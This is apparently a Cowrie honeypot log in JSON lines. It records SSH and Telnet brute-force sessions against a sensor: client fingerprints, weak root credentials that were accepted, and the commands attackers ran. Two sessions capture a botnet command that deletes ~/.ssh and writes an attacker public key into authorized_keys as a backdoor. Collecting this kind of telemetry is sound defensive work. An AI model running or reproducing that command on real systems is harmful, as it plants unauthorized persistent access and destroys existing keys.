{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:18.622792Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.login.success","username":"root","password":"mudar123","message":"login attempt [root/mudar123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:05:19.672657Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:05:20.198147Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:05:20.198932Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:05:20.199944Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:20.452646Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56896,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf6bef825313","protocol":"ssh","message":"New connection: 212.227.235.229:56896 (1.2.3.4:22) [session: bf6bef825313]","sensor":"my-vps","timestamp":"2025-08-31T05:05:20.948147Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:05:21.406178Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:05:21.406968Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:05:21.662702Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:21.663680Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49202,"dst_ip":"1.2.3.4","dst_port":22,"session":"9155109af9c3","protocol":"ssh","message":"New connection: 212.227.235.229:49202 (1.2.3.4:22) [session: 9155109af9c3]","sensor":"my-vps","timestamp":"2025-08-31T05:05:21.931952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:21.932608Z","src_ip":"212.227.235.229","session":"9155109af9c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:22.202497Z","src_ip":"212.227.235.229","session":"9155109af9c3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:05:23.321499Z","src_ip":"212.227.235.229","session":"9155109af9c3"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:05:24.103589Z","src_ip":"212.227.125.160","session":"d5b3c81eb270"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:25.252530Z","src_ip":"212.227.235.229","session":"9155109af9c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49212,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fdf2113f9f4","protocol":"ssh","message":"New connection: 212.227.235.229:49212 (1.2.3.4:22) [session: 3fdf2113f9f4]","sensor":"my-vps","timestamp":"2025-08-31T05:05:25.514142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:25.515036Z","src_ip":"212.227.235.229","session":"3fdf2113f9f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:25.779139Z","src_ip":"212.227.235.229","session":"3fdf2113f9f4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:05:26.870478Z","src_ip":"212.227.235.229","session":"3fdf2113f9f4"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:27.134173Z","src_ip":"212.227.235.229","session":"00f47b8eee8b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:27.135880Z","src_ip":"212.227.235.229","session":"3fdf2113f9f4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:05:28.423859Z","src_ip":"212.227.235.229","session":"bf6bef825313"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:05:28.446284Z","src_ip":"212.227.235.229","session":"bf6bef825313"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37117,"dst_ip":"1.2.3.4","dst_port":23,"session":"6dfeb2d49799","protocol":"telnet","message":"New connection: 212.227.125.160:37117 (1.2.3.4:23) [session: 6dfeb2d49799]","sensor":"my-vps","timestamp":"2025-08-31T05:05:37.168343Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":47576,"dst_ip":"1.2.3.4","dst_port":23,"session":"e03fe811f5f1","protocol":"telnet","message":"New connection: 103.77.214.206:47576 (1.2.3.4:23) [session: e03fe811f5f1]","sensor":"my-vps","timestamp":"2025-08-31T05:05:38.149499Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46020,"dst_ip":"1.2.3.4","dst_port":22,"session":"c804a1c2ce8d","protocol":"ssh","message":"New connection: 212.227.235.229:46020 (1.2.3.4:22) [session: c804a1c2ce8d]","sensor":"my-vps","timestamp":"2025-08-31T05:05:40.349497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:05:40.986972Z","src_ip":"212.227.235.229","session":"c804a1c2ce8d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:05:40.987822Z","src_ip":"212.227.235.229","session":"c804a1c2ce8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45918,"dst_ip":"1.2.3.4","dst_port":22,"session":"e143844b26cf","protocol":"ssh","message":"New connection: 212.227.235.229:45918 (1.2.3.4:22) [session: e143844b26cf]","sensor":"my-vps","timestamp":"2025-08-31T05:05:44.790764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:44.791762Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:45.050545Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.session.closed","duration":"51.0","message":"Connection lost after 51.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:45.281289Z","src_ip":"212.227.125.160","session":"d5b3c81eb270"}
{"eventid":"cowrie.login.success","username":"root","password":"alireza","message":"login attempt [root/alireza] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:05:46.147401Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.login.failed","username":"server","password":"12345","message":"login attempt [server/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:05:46.668519Z","src_ip":"212.227.235.229","session":"c804a1c2ce8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:05:46.689227Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:05:46.689885Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:05:46.691030Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:46.959254Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:05:47.539535Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:05:47.540250Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:05:47.808762Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:47.809686Z","src_ip":"212.227.235.229","session":"e143844b26cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45930,"dst_ip":"1.2.3.4","dst_port":22,"session":"e623c61bb195","protocol":"ssh","message":"New connection: 212.227.235.229:45930 (1.2.3.4:22) [session: e623c61bb195]","sensor":"my-vps","timestamp":"2025-08-31T05:05:48.059124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:48.059755Z","src_ip":"212.227.235.229","session":"e623c61bb195"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:05:48.314150Z","src_ip":"212.227.235.229","session":"e623c61bb195"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:48.515768Z","src_ip":"212.227.235.229","session":"c804a1c2ce8d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:05:49.379737Z","src_ip":"212.227.235.229","session":"e623c61bb195"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:05:50.637265Z","src_ip":"212.227.235.229","session":"e623c61bb195"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52578,"dst_ip":"1.2.3.4","dst_port":22,"session":"851c8e3f2496","protocol":"ssh","message":"New connection: 212.227.235.229:52578 (1.2.3.4:22) [session: 851c8e3f2496]","sensor":"my-vps","timestamp":"2025-08-31T05:05:50.915224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:05:50.916634Z","src_ip":"212.227.235.229","session":"851c8e3f2496"}
